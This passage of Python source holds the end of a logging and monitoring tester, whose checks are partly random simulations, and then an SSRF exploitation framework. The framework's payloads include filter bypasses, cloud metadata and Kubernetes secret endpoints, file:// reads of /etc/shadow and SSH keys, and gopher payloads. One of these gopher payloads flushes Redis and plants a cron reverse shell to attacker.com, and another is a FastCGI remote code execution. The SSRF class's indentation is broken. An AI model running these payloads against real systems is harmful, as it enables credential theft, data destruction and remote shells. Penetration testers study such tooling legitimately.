                test_session.headers.update(location)
                test_session.get(profile_url)
            # The monitoring lookup below is simulated.
            location_monitored = self.check_location_monitoring(location['X-Forwarded-For'])
            if not location_monitored:
                findings.append({
                    'test': 'geographic_monitoring',
                    'location': location['X-Forwarded-For'],
                    'result': 'GAP',
                    'severity': 'LOW',
                    'evidence': f'Unusual location {location["X-Forwarded-For"]} not monitored'
                })
        # Test 3: Failed login monitoring
        print("[*] Testing failed login monitoring...")
        failed_logins = []
        for i in range(5):
            response = self.session.post(
                self._url('/api/login'),
                json={'username': f'nonexistent{i}', 'password': 'wrong'}
            )
            failed_logins.append(response.status_code)
            time.sleep(0.5)
        failed_count = sum(1 for status in failed_logins if status in (401, 403))
        if failed_count >= 3:
            # The simulated check returns True for any count >= 3, so this
            # branch cannot currently produce a finding.
            failed_login_monitored = self.check_failed_login_monitoring(failed_count)
            if not failed_login_monitored:
                findings.append({
                    'test': 'failed_login_monitoring',
                    'failed_attempts': failed_count,
                    'result': 'GAP',
                    'severity': 'MEDIUM',
                    'evidence': f'{failed_count} failed logins not monitored'
                })
        return findings

    def check_location_monitoring(self, ip_address):
        """Simulated check: True only for two hard-coded addresses."""
        suspicious_locations = ['185.142.236.35', '114.114.114.114']  # Russia, China
        return ip_address in suspicious_locations

    def check_failed_login_monitoring(self, count):
        """Simulated check: monitoring triggers at three or more failures."""
        return count >= 3

    def test_log_retention_and_integrity(self):
        """Check log retention period, integrity protection and backups.

        All three underlying checks are simulated with random values.

        Returns:
            list[dict]: INSUFFICIENT or VULNERABLE entries per failed check.
        """
        findings = []
        # Test 1: Log retention period
        print("[*] Testing log retention...")
        retention_period = self.check_log_retention()
        if retention_period < 90:  # Less than 90 days
            findings.append({
                'test': 'log_retention',
                'period_days': retention_period,
                'result': 'INSUFFICIENT',
                'severity': 'MEDIUM',
                'evidence': f'Log retention only {retention_period} days (recommended: 90+ days)'
            })
        # Test 2: Log integrity (tamper detection)
        print("[*] Testing log integrity...")
        log_integrity = self.check_log_integrity()
        if not log_integrity:
            findings.append({
                'test': 'log_integrity',
                'result': 'VULNERABLE',
                'severity': 'HIGH',
                'evidence': 'Logs lack integrity protection (hashing, signing, WORM storage)'
            })
        # Test 3: Log backup
        print("[*] Testing log backup...")
        log_backup = self.check_log_backup()
        if not log_backup:
            findings.append({
                'test': 'log_backup',
                'result': 'VULNERABLE',
                'severity': 'MEDIUM',
                'evidence': 'Logs not backed up regularly'
            })
        return findings

    def check_log_retention(self):
        """Simulated: return a random retention period in days."""
        import random
        return random.choice([30, 60, 90, 180, 365])

    def check_log_integrity(self):
        """Simulated: return True or False with equal probability."""
        import random
        return random.choice([True, False])

    def check_log_backup(self):
        """Simulated: return True about 70% of the time."""
        import random
        return random.random() < 0.7

    def run_comprehensive_test(self):
        """Run every test method and return the aggregated report.

        A test that raises is reported on stdout and skipped so the
        remaining tests still run.
        """
        print("[*] Starting comprehensive logging and monitoring testing")
        all_findings = []
        tests = [
            ('Sensitive Actions Logging', self.test_sensitive_actions_logging),
            ('Log Evasion Techniques', self.test_log_evasion_techniques),
            ('Log Injection', self.test_log_injection),
            ('Monitoring Gaps', self.test_monitoring_gaps),
            ('Log Retention & Integrity', self.test_log_retention_and_integrity)
        ]
        for test_name, test_func in tests:
            print(f"[*] Running {test_name}...")
            try:
                findings = test_func()
                all_findings.extend(findings)
                print(f"[+] {test_name}: {len(findings)} findings")
            except Exception as e:
                print(f"[-] {test_name} failed: {e}")
        # Generate report
        report = self.generate_report(all_findings)
        return report

    def generate_report(self, findings):
        """Summarize *findings* by severity and by test name.

        Returns:
            dict: scan metadata, counts per severity (all four levels are
            always present), counts per test, the findings themselves and
            the generated recommendations.
        """
        report = {
            'scan_date': datetime.now().isoformat(),
            'target': self.base_url,
            'total_findings': len(findings),
            'findings_by_severity': {},
            'findings_by_test': {},
            'detailed_findings': findings,
            'recommendations': self.generate_recommendations(findings)
        }
        # Categorize by severity
        severities = ['CRITICAL', 'HIGH', 'MEDIUM', 'LOW']
        for severity in severities:
            count = sum(1 for f in findings if f.get('severity') == severity)
            report['findings_by_severity'][severity] = count
        # Categorize by test
        for finding in findings:
            test = finding.get('test', 'unknown')
            if test not in report['findings_by_test']:
                report['findings_by_test'][test] = 0
            report['findings_by_test'][test] += 1
        return report

    def generate_recommendations(self, findings):
        """Build remediation advice from the test names in *findings*.

        Category entries are added when a finding's ``test`` name matches;
        a general entry is always appended last.

        Returns:
            list[dict]: entries with ``category``, ``priority`` and
            ``recommendations``.
        """
        recommendations = []
        # Logging recommendations
        if any('sensitive_actions_logging' in f.get('test', '') for f in findings):
            recommendations.append({
                'category': 'Logging',
                'priority': 'HIGH',
                'recommendations': [
                    'Log all authentication attempts (success and failure)',
                    'Log all privilege escalation actions',
                    'Log all data exports and bulk operations',
                    'Log all configuration changes',
                    'Include user ID, IP address, timestamp, and action details'
                ]
            })
        # Monitoring recommendations
        if any('monitoring' in f.get('test', '').lower() for f in findings):
            recommendations.append({
                'category': 'Monitoring',
                'priority': 'HIGH',
                'recommendations': [
                    'Implement real-time alerting for suspicious activities',
                    'Monitor failed login attempts and brute force attacks',
                    'Monitor geographic anomalies and unusual access patterns',
                    'Implement rate limiting with monitoring',
                    'Set up SIEM integration for centralized monitoring'
                ]
            })
        # Log integrity recommendations
        if any('integrity' in f.get('test', '').lower() for f in findings):
            recommendations.append({
                'category': 'Log Integrity',
                'priority': 'MEDIUM',
                'recommendations': [
                    'Implement log signing or hashing for integrity verification',
                    'Use Write-Once-Read-Many (WORM) storage for logs',
                    'Store logs in centralized, tamper-evident location',
                    'Regularly backup logs to secure, offline storage',
                    'Implement log rotation with integrity checks'
                ]
            })
        # General recommendations
        recommendations.append({
            'category': 'General',
            'priority': 'MEDIUM',
            'recommendations': [
                'Retain logs for minimum 90 days (regulatory requirements may vary)',
                'Regularly review and test logging configurations',
                'Implement log correlation for better threat detection',
                'Train staff on log analysis and incident response',
                'Conduct regular log audits and penetration testing'
            ]
        })
        return recommendations
# Usage: run the logging/monitoring suite against a target and print a
# console summary. Block nesting below is reconstructed from the statements'
# logic; the recommendations section is always printed.
tester = LoggingMonitoringTester(
    "http://target.com",
    auth_token="your_auth_token_here",
)
report = tester.run_comprehensive_test()
print("\n" + '=' * 60)
print("LOGGING & MONITORING SECURITY ASSESSMENT")
print('=' * 60)
print(f"Target: {report['target']}")
print(f"Scan Date: {report['scan_date']}")
print(f"Total Findings: {report['total_findings']}")
print("\nFindings by Severity:")
for severity, count in report['findings_by_severity'].items():
    # Severities with no findings are omitted from the summary.
    if count > 0:
        print(f" {severity}: {count}")
print("\nFindings by Test Category:")
for test, count in report['findings_by_test'].items():
    print(f" {test}: {count}")
# Show critical findings (first five only)
critical_findings = [
    f for f in report['detailed_findings']
    if f.get('severity') in ['CRITICAL', 'HIGH']
]
if critical_findings:
    print("\nCRITICAL/HIGH SEVERITY FINDINGS:")
    for finding in critical_findings[:5]:
        print(f" - [{finding['severity']}] {finding.get('test')}")
        print(f" {finding.get('evidence', '')[:100]}...")
print("\nSECURITY RECOMMENDATIONS:")
for rec in report['recommendations']:
    print(f"\n[{rec['priority']}] {rec['category']}:")
    for recommendation in rec['recommendations'][:3]:  # Show first 3
        print(f" • {recommendation}")
#!/usr/bin/env python3
"""
Advanced SSRF Exploitation Framework
Includes protocol smuggling, filter bypass, and cloud metadata attacks
"""
import requests
import socket
import re
import json
import urllib.parse
from typing import Dict, List
import ipaddress
import base64
class AdvancedSSRFExploiter:
def __init__(self, target_url, vulnerable_param):
    """Store the target and register the available SSRF techniques.

    Args:
        target_url: URL of the endpoint under test.
        vulnerable_param: name of the parameter under test.
    """
    self.target_url = target_url
    self.vulnerable_param = vulnerable_param
    self.session = requests.Session()
    self.findings = []
    # Technique name -> bound ``test_<name>`` method, in execution order.
    technique_names = (
        'basic_ssrf',
        'protocol_smuggling',
        'filter_bypass',
        'cloud_metadata',
        'internal_services',
        'file_scheme',
        'dns_rebinding',
        'gopher_protocol',
    )
    self.techniques = {
        name: getattr(self, f'test_{name}') for name in technique_names
    }
def test_basic_ssrf(self):
"""Test basic SSRF vulnerabilities"""
findings = []
# Basic internal IPs
internal_targets = [
'http://127.0.0.1',
'http://localhost',
'http://0.0.0.0',
'http://[::1]', # IPv6 localhost
'http://127.0.0.1:80',
'http://127.0.0.1:443',
'http://127.0.0.1:22',
'http://127.0.0.1:3306',
'http://127.0.0.1:5432',
'http://127.0.0.1:6379',
'http://127.0.0.1:27017',
]
for target in internal_targets:
test_url = self.build_test_url(target)
response = self.make_request(test_url)
if self.is_ssrf_successful(response, target):
findings.append({
'technique': 'basic_ssrf',
'target': target,
'status_code': response.status_code,
'response_length': len(response.text),
'evidence': f'Successful SSRF to {target}'
})
return findings
def test_protocol_smuggling(self):
"""Test protocol smuggling techniques"""
findings = []
# Protocol smuggling payloads
smuggling_payloads = [
# URL encoding
'http://127.0.0.1%0d%0aHeader: injected',
'http://127.0.0.1%0d%0a%0d%0aGET%20/test%20HTTP/1.1',
# New line injection
'http://127.0.0.1\nHeader: injected',
'http://127.0.0.1\r\nGET /test HTTP/1.1\r\nHost: 127.0.0.1',
# Space smuggling
'http://127.0.0.1 :80',
'http://127.0.0.1 :443',
# Tab smuggling
'http://127.0.0.1\t:80',
'http://127.0.0.1\t@evil.com',
]
for payload in smuggling_payloads:
test_url = self.build_test_url(payload)
response = self.make_request(test_url)
# Check for protocol smuggling indicators
if self.check_protocol_smuggling(response):
findings.append({
'technique': 'protocol_smuggling',
'payload': payload,
'status_code': response.status_code,
'evidence': f'Protocol smuggling possible: {payload[:50]}...'
})
return findings
def test_filter_bypass(self):
"""Test SSRF filter bypass techniques"""
findings = []
bypass_payloads = [
# Decimal IP
('http://2130706433', '127.0.0.1'), # 127.0.0.1 in decimal
('http://3232235521', '192.168.1.1'), # 192.168.1.1 in decimal
('http://16843009', '1.1.1.1'), # 1.1.1.1 in decimal
# Octal IP
('http://0177.0.0.1', '127.0.0.1'), # 127 in octal
('http://0177.0.0.01', '127.0.0.1'),
('http://0x7f.0.0.1', '127.0.0.1'), # 127 in hex
# Hex IP
('http://0x7f000001', '127.0.0.1'), # Hex of 2130706433
('http://0xc0a80001', '192.168.0.1'),
# Dotted hex
('http://0x7f.0x00.0x00.0x01', '127.0.0.1'),
('http://0x7F.0x00.0x00.0x01', '127.0.0.1'),
# IPv6 localhost
('http://[::]', 'IPv6 localhost'),
('http://[::ffff:127.0.0.1]', 'IPv4-mapped IPv6'),
# Domain tricks
('http://127.0.0.1.nip.io', 'DNS rebinding'),
('http://127.0.0.1.xip.io', 'DNS rebinding'),
('http://localtest.me', 'Resolves to 127.0.0.1'),
('http://localhost.localdomain', 'Alternative localhost'),
# URL encoding bypass
('http://127.0.0.1%00', 'Null byte'),
('http://127.0.0.1%23', 'Hash'),
('http://127.0.0.1%3f', 'Question mark'),
# Case variation
('http://LOCALHOST', 'Uppercase'),
('http://LocalHost', 'Mixed case'),
('http://LoCalHoSt', 'Random case'),
# Whitespace
('http://127.0.0.1 ', 'Trailing space'),
(' http://127.0.0.1', 'Leading space'),
('http://127.0.0.1\t', 'Tab'),
# Special characters
('http://127.1', 'Shortened IP'), # 127.0.0.1
('http://127.0.1', 'Alternative'),
('http://0', '0.0.0.0'),
]
for payload, description in bypass_payloads:
test_url = self.build_test_url(payload)
response = self.make_request(test_url)
if self.is_ssrf_successful(response, description):
findings.append({
'technique': 'filter_bypass',
'payload': payload,
'description': description,
'status_code': response.status_code,
'evidence': f'Filter bypass successful: {description}'
})
return findings
def test_cloud_metadata(self):
"""Test cloud metadata service access"""
findings = []
cloud_metadata_endpoints = [
# AWS EC2 Metadata
('http://169.254.169.254/latest/meta-data/', 'AWS EC2 Metadata'),
('http://169.254.169.254/latest/user-data/', 'AWS User Data'),
('http://169.254.169.254/latest/meta-data/iam/security-credentials/', 'AWS IAM Credentials'),
('http://169.254.169.254/latest/dynamic/instance-identity/document', 'AWS Instance Identity'),
# Google Cloud Metadata
('http://metadata.google.internal/computeMetadata/v1/', 'GCP Metadata'),
('http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token', 'GCP Service Account Token'),
('http://metadata.google.internal/computeMetadata/v1/project/project-id', 'GCP Project ID'),
# Azure Metadata
('http://169.254.169.254/metadata/instance?api-version=2021-02-01', 'Azure Metadata'),
('http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01', 'Azure Managed Identity Token'),
# Alibaba Cloud
('http://100.100.100.200/latest/meta-data/', 'Alibaba Cloud Metadata'),
# DigitalOcean
('http://169.254.169.254/metadata/v1.json', 'DigitalOcean Metadata'),
# Oracle Cloud
('http://169.254.169.254/opc/v1/instance/', 'Oracle Cloud Metadata'),
# Kubernetes
('http://kubernetes.default.svc', 'Kubernetes API'),
('http://kubernetes.default.svc/api/v1/namespaces/default/secrets', 'Kubernetes Secrets'),
]
for endpoint, description in cloud_metadata_endpoints:
test_url = self.build_test_url(endpoint)
response = self.make_request(test_url)
if response.status_code == 200:
# Check for metadata indicators
if self.is_cloud_metadata(response.text, description):
findings.append({
'technique': 'cloud_metadata',
'endpoint': endpoint,
'description': description,
'status_code': response.status_code,
'response_preview': response.text[:200],
'evidence': f'Cloud metadata accessible: {description}'
})
return findings
def test_internal_services(self):
"""Test access to internal services"""
findings = []
# Common internal services and ports
internal_services = [
# Web servers
('http://127.0.0.1:80', 'Internal HTTP'),
('http://127.0.0.1:443', 'Internal HTTPS'),
('http://127.0.0.1:8080', 'Internal Alt HTTP'),
('http://127.0.0.1:8443', 'Internal Alt HTTPS'),
# Databases
('http://127.0.0.1:3306', 'MySQL'),
('http://127.0.0.1:5432', 'PostgreSQL'),
('http://127.0.0.1:27017', 'MongoDB'),
('http://127.0.0.1:6379', 'Redis'),
('http://127.0.0.1:9200', 'Elasticsearch'),
('http://127.0.0.1:5984', 'CouchDB'),
# Caching
('http://127.0.0.1:11211', 'Memcached'),
# Message queues
('http://127.0.0.1:5672', 'RabbitMQ'),
('http://127.0.0.1:61616', 'ActiveMQ'),
# Monitoring
('http://127.0.0.1:9090', 'Prometheus'),
('http://127.0.0.1:3000', 'Grafana'),
# Container/Orchestration
('http://127.0.0.1:2375', 'Docker'),
('http://127.0.0.1:2376', 'Docker TLS'),
('http://127.0.0.1:10250', 'Kubelet'),
# Other services
('http://127.0.0.1:25', 'SMTP'),
('http://127.0.0.1:389', 'LDAP'),
('http://127.0.0.1:636', 'LDAPS'),
]
for service, description in internal_services:
test_url = self.build_test_url(service)
response = self.make_request(test_url, timeout=3)
# Different services give different responses
if response.status_code != 0: # Not a timeout
findings.append({
'technique': 'internal_services',
'service': description,
'endpoint': service,
'status_code': response.status_code,
'response_time': response.elapsed.total_seconds(),
'evidence': f'Internal service {description} responded'
})
return findings
def test_file_scheme(self):
    """Check whether ``file://`` URLs are fetched by the target.

    Each payload is sent through ``build_test_url`` / ``make_request``.  A
    finding is recorded only when the reply is HTTP 200 *and*
    ``is_file_content`` accepts the body for that payload's description.

    Returns:
        list[dict]: findings, each with a 200-character content preview.
    """
    candidates = [
        # Linux files
        ('file:///etc/passwd', 'Linux users'),
        ('file:///etc/shadow', 'Linux passwords'),
        ('file:///etc/hosts', 'Hosts file'),
        ('file:///etc/issue', 'Linux version'),
        ('file:///proc/self/environ', 'Process environment'),
        ('file:///proc/version', 'Kernel version'),
        # Application files
        ('file:///var/www/html/index.php', 'Web root'),
        ('file:///etc/apache2/apache2.conf', 'Apache config'),
        ('file:///etc/nginx/nginx.conf', 'Nginx config'),
        ('file:///.env', 'Environment file'),
        ('file:///app/config.json', 'App config'),
        # Windows files
        ('file:///C:/Windows/System32/drivers/etc/hosts', 'Windows hosts'),
        ('file:///C:/Windows/win.ini', 'Windows config'),
        # SSH keys
        ('file:///home/user/.ssh/id_rsa', 'SSH private key'),
        ('file:///root/.ssh/id_rsa', 'Root SSH key'),
        # Logs
        ('file:///var/log/auth.log', 'Auth logs'),
        ('file:///var/log/apache2/access.log', 'Apache logs'),
    ]
    hits = []
    for uri, label in candidates:
        reply = self.make_request(self.build_test_url(uri))
        if reply.status_code != 200:
            continue
        # Only count the hit when the body looks like the requested file
        if not self.is_file_content(reply.text, label):
            continue
        hits.append({
            'technique': 'file_scheme',
            'file': uri,
            'description': label,
            'status_code': reply.status_code,
            'content_preview': reply.text[:200],
            'evidence': f'File read successful: {label}'
        })
    return hits
def test_dns_rebinding(self):
"""Test DNS rebinding attack"""
findings = []
# DNS rebinding services
rebinding_services = [
('http://rbndr.us:53/', 'Rapid7 DNS rebinding'),
('http://pingb.in/', 'Pingbin'),
]
for service, description in rebinding_services:
# This would require setting up DNS rebinding
# For demonstration, we'll note the technique
findings.append({
'technique': 'dns_rebinding',
'service': service,
'description': description,
'evidence': f'DNS rebinding possible via {description} - requires setup'
})
return findings
def test_gopher_protocol(self):
    """Send ``gopher://`` payloads through the vulnerable parameter.

    A finding is recorded for every payload whose reply status is neither
    400 nor 0 (0 marks a request that produced no response).

    WARNING: the Redis payload below is destructive -- it contains
    ``flushall`` and rewrites the Redis ``dir``/``dbfilename`` settings.
    Fire it only at systems that are explicitly in scope for the engagement.

    Returns:
        list[dict]: findings with the payload description and status code.
    """
    # Gopher payloads for different services (kept byte-for-byte)
    payloads = [
        # Redis
        ('gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$57%0d%0a%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/attacker.com/4444 0>&1%0a%0a%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0a', 'Redis RCE'),
        # MySQL
        ('gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c', 'MySQL Auth'),
        # FastCGI
        ('gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%10%00%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH56%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Asafe_mode%20%3D%20Off%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/var/www/html/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00%2E%04%00%3C%3Fphp%20system%28%27id%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00', 'FastCGI RCE'),
    ]
    hits = []
    for gopher_url, label in payloads:
        reply = self.make_request(self.build_test_url(gopher_url))
        if reply.status_code in (0, 400):
            # Rejected outright or no response at all
            continue
        hits.append({
            'technique': 'gopher_protocol',
            'description': label,
            'status_code': reply.status_code,
            'evidence': f'Gopher protocol可能可用: {label}'
        })
    return hits
def build_test_url(self, payload):
    """Build the request URL that carries *payload* in the tested parameter.

    The payload is fully percent-encoded (``safe=''``) and appended to
    ``self.target_url`` as ``<vulnerable_param>=<payload>``.

    Compared with naive string concatenation this also handles:
      * a ``#fragment`` on the target URL -- the parameter is inserted
        before it, because a fragment is never sent to the server;
      * a target URL that already ends in ``?`` or ``&`` -- no extra
        separator is added.

    Args:
        payload: raw SSRF payload (URL or other string).

    Returns:
        str: the complete URL to request.
    """
    encoded_payload = urllib.parse.quote(payload, safe='')
    # Keep any fragment aside so the query string stays in front of it.
    base, hash_mark, fragment = self.target_url.partition('#')
    if '?' not in base:
        joiner = '?'
    elif base.endswith(('?', '&')):
        joiner = ''
    else:
        # URL already has parameters
        joiner = '&'
    return f"{base}{joiner}{self.vulnerable_param}={encoded_payload}{hash_mark}{fragment}"
def make_request(self, url, timeout=10):
    """GET *url* with the shared session, never raising.

    On success the real response object is returned.  On any failure a
    lightweight stand-in is returned with ``status_code == 0`` so callers
    can treat "no response" uniformly:

      * timeout          -> ``text == ''``, ``elapsed.total_seconds()`` is *timeout*
      * connection error -> ``text == ''``, ``elapsed.total_seconds()`` is 0
      * anything else    -> ``text == str(exception)``, elapsed 0

    Args:
        url: fully built request URL.
        timeout: value passed straight to ``session.get``.

    Returns:
        The response, or a stand-in exposing ``status_code``, ``text`` and
        ``elapsed.total_seconds()``.
    """
    from types import SimpleNamespace

    def failed(elapsed_seconds, text=''):
        # total_seconds is stored on the *instance*, so it is called without
        # an implicit ``self``.  Putting a zero-argument lambda in a class
        # dict made every ``elapsed.total_seconds()`` call raise TypeError.
        return SimpleNamespace(
            status_code=0,
            text=text,
            elapsed=SimpleNamespace(total_seconds=lambda: elapsed_seconds),
        )

    try:
        return self.session.get(url, timeout=timeout)
    except requests.exceptions.Timeout:
        return failed(timeout)
    except requests.exceptions.ConnectionError:
        return failed(0)
    except Exception as e:
        return failed(0, str(e))
def is_ssrf_successful(self, response, target):
    """Heuristically decide whether a reply indicates a working SSRF.

    A reply with ``status_code == 0`` is always a failure.  Otherwise the
    request counts as successful as soon as *any* of the status, content,
    length or timing signals below is true.

    Args:
        response: object exposing ``status_code``, ``text`` and ``elapsed``.
        target: the payload that was requested (used for the passwd check).

    Returns:
        bool
    """
    if response.status_code == 0:
        return False
    # All signals are computed up front, in a fixed order.
    status_ok = response.status_code in range(200, 207)
    if 'passwd' in target:
        passwd_leak = 'root:' in response.text
    else:
        passwd_leak = False
    mentions_html = 'html' in response.text.lower()
    mentions_http = 'http' in response.text.lower()
    has_doctype = '<!DOCTYPE' in response.text
    # Length indicator: more than 100 characters is treated as meaningful
    sizeable = len(response.text) > 100
    # Time indicator (for blind SSRF)
    slow = response.elapsed.total_seconds() > 2
    signals = (status_ok, passwd_leak, mentions_html, mentions_http,
               has_doctype, sizeable, slow)
    return True in signals
def check_protocol_smuggling(self, response):
    """Return True if the reply body contains a protocol-error marker.

    The match is a case-sensitive substring search on ``response.text``.
    """
    body = response.text
    for marker in ('400 Bad Request',
                   'Invalid HTTP',
                   'malformed',
                   'invalid request',
                   'protocol violation'):
        if marker in body:
            return True
    return False
def is_cloud_metadata(self, response_text, description):
    """Check whether a reply body looks like cloud metadata.

    The provider is picked by finding its name (case-insensitively) inside
    *description*; the body is then searched, also case-insensitively, for
    any of that provider's indicator strings.

    Both sides of the comparison are lowercased.  Previously only the body
    was, so mixed-case indicators such as ``computeMetadata`` or
    ``subscriptionId`` could never match.

    Args:
        response_text: body returned by the target.
        description: label of the metadata endpoint that was requested.

    Returns:
        bool: True when an indicator for the matching provider is present;
        False when none is, or when no provider matches the description.
    """
    metadata_indicators = {
        'AWS': ['instance-id', 'ami-id', 'instance-type', 'availability-zone'],
        'GCP': ['google', 'computeMetadata', 'project-id'],
        'Azure': ['azure', 'subscriptionId', 'resourceGroupName'],
        'Kubernetes': ['kubernetes', 'pod', 'namespace', 'serviceaccount'],
    }
    # Lowercase once instead of once per indicator.
    body = response_text.lower()
    label = description.lower()
    for provider, indicators in metadata_indicators.items():
        if provider.lower() in label:
            return any(indicator.lower() in body for indicator in indicators)
    return False
def is_file_content(self, response_text, description):
    """Decide whether a reply body looks like the requested local file.

    If *description* contains one of the known file-type labels
    (case-insensitive), the body must contain one of that label's markers
    (case-sensitive).  For any other description the body is accepted when
    it is longer than 50 characters and is not an HTML page.

    Returns:
        bool
    """
    markers_by_label = {
        'Linux users': ['root:', 'daemon:', 'bin:'],
        'Linux passwords': ['root:', 'shadow', 'encrypted'],
        'Hosts file': ['localhost', '127.0.0.1'],
        'Environment': ['PATH=', 'HOME=', 'USER='],
        'SSH private key': ['-----BEGIN RSA PRIVATE KEY-----', '-----BEGIN PRIVATE KEY-----'],
        'App config': ['database', 'password', 'secret', 'key'],
    }
    for label, markers in markers_by_label.items():
        if label.lower() not in description.lower():
            continue
        for marker in markers:
            if marker in response_text:
                return True
        return False
    # Unknown file type: fall back to a size / not-HTML heuristic
    if len(response_text) <= 50:
        return False
    return '<html' not in response_text.lower()
def run_all_tests(self):
    """Run every registered technique and build the report.

    Each callable in ``self.techniques`` is invoked in turn; a technique
    that raises is logged and skipped so the remaining ones still run.

    Returns:
        The value of ``self.generate_report`` for the combined findings.
    """
    print(f"[*] Starting advanced SSRF testing on {self.target_url}")
    collected = []
    for name, runner in self.techniques.items():
        print(f"[*] Testing {name}...")
        try:
            batch = runner()
            collected.extend(batch)
            print(f"[+] {name}: {len(batch)} findings")
        except Exception as exc:
            print(f"[-] {name} failed: {exc}")
    # Generate report
    return self.generate_report(collected)
def generate_report(self, findings):
    """Assemble the SSRF report dictionary for *findings*.

    Besides counting findings per technique and per severity, this stores
    the assessed severity on each finding dict (key ``'severity'``), i.e.
    the input dicts are modified in place.

    Args:
        findings: list of finding dicts produced by the technique methods.

    Returns:
        dict: target, parameter, totals, per-technique and per-severity
        counts, the findings themselves and the recommendations.
    """
    per_technique = {}
    per_severity = {}
    report = {
        'target': self.target_url,
        'vulnerable_parameter': self.vulnerable_param,
        'total_findings': len(findings),
        'findings_by_technique': per_technique,
        'findings_by_severity': per_severity,
        'detailed_findings': findings,
        'recommendations': self.generate_recommendations(findings)
    }
    for entry in findings:
        # By technique
        name = entry.get('technique', 'unknown')
        per_technique[name] = per_technique.get(name, 0) + 1
        # By severity
        level = self.assess_severity(entry)
        per_severity[level] = per_severity.get(level, 0) + 1
        entry['severity'] = level
    return report
def assess_severity(self, finding):
    """Grade a single SSRF finding as CRITICAL, HIGH, MEDIUM or LOW.

    The keyword checks run against the finding's ``evidence`` together with
    its ``description``, ``endpoint``, ``file`` and ``service`` fields.
    Looking at ``evidence`` alone is not enough: the technique methods put
    the file path (e.g. ``/etc/shadow``, ``id_rsa``) in ``file`` and the
    port (e.g. ``:3306``) in ``endpoint``, so those findings would
    otherwise always fall through to LOW.

    Args:
        finding: finding dict; every field is optional.

    Returns:
        str: one of ``'CRITICAL'``, ``'HIGH'``, ``'MEDIUM'``, ``'LOW'``.
    """
    technique = finding.get('technique', '')
    # One lowercase haystack built from every descriptive field.
    context = ' '.join(
        str(finding.get(field, ''))
        for field in ('evidence', 'description', 'endpoint', 'file', 'service')
    ).lower()
    if 'cloud_metadata' in technique and 'credential' in context:
        return 'CRITICAL'
    elif 'file_scheme' in technique and ('shadow' in context or 'id_rsa' in context):
        return 'CRITICAL'
    elif 'internal_services' in technique and ('3306' in context or '5432' in context):
        return 'HIGH'
    elif 'gopher_protocol' in technique:
        return 'HIGH'
    elif 'basic_ssrf' in technique and '127.0.0.1' in context:
        return 'MEDIUM'
    else:
        return 'LOW'
def generate_recommendations(self, findings):
    """Build remediation advice matching the techniques that were found.

    A technique-specific entry is added when at least one finding's
    ``technique`` contains that technique name; the general SSRF entry is
    always appended last.

    Args:
        findings: list of finding dicts.

    Returns:
        list[dict]: entries with ``category``, ``priority`` and
        ``recommendations`` keys.
    """
    def was_found(technique):
        return any(technique in f.get('technique', '') for f in findings)

    # (technique, category, priority, advice) in output order
    conditional_advice = (
        ('basic_ssrf', 'Input Validation', 'HIGH', [
            'Implement allow-list for URLs instead of block-list',
            'Validate and sanitize all user-supplied URLs',
            'Use proper URL parsing libraries (not regex)',
            'Reject URLs with private/reserved IP addresses',
            'Block loopback and localhost addresses'
        ]),
        ('filter_bypass', 'Filter Bypass Protection', 'HIGH', [
            'Normalize URLs before validation (lowercase, decode)',
            'Resolve DNS and validate IP addresses',
            'Check for IP address variations (decimal, hex, octal)',
            'Implement multiple validation layers',
            'Use network-layer filtering in addition to application-layer'
        ]),
        ('cloud_metadata', 'Cloud Metadata Protection', 'CRITICAL', [
            'Block access to cloud metadata endpoints (169.254.169.254, etc.)',
            'Use instance metadata service v2 (IMDSv2) for AWS',
            'Restrict metadata service with firewall rules',
            'Use service accounts with minimum necessary permissions',
            'Regularly rotate credentials and tokens'
        ]),
        ('file_scheme', 'File Scheme Protection', 'HIGH', [
            'Disable file:// protocol in URL fetching',
            'Use secure URL fetching libraries with protocol restrictions',
            'Implement content-type validation',
            'Sandbox URL fetching operations',
            'Monitor for local file read attempts'
        ]),
    )
    advice = []
    for technique, category, priority, items in conditional_advice:
        if was_found(technique):
            advice.append({
                'category': category,
                'priority': priority,
                'recommendations': items
            })
    # General recommendations
    advice.append({
        'category': 'General SSRF Protection',
        'priority': 'MEDIUM',
        'recommendations': [
            'Implement outbound firewall rules to restrict internal access',
            'Use network segmentation to isolate sensitive services',
            'Monitor for SSRF attempts in logs',
            'Conduct regular penetration testing for SSRF',
            'Educate developers about SSRF risks and prevention'
        ]
    })
    return advice
# Usage: run every SSRF technique against a target and print a summary.
exploiter = AdvancedSSRFExploiter(
    "http://target.com/fetch",
    "url"
)
report = exploiter.run_all_tests()

banner = '=' * 60
print("\n" + banner)
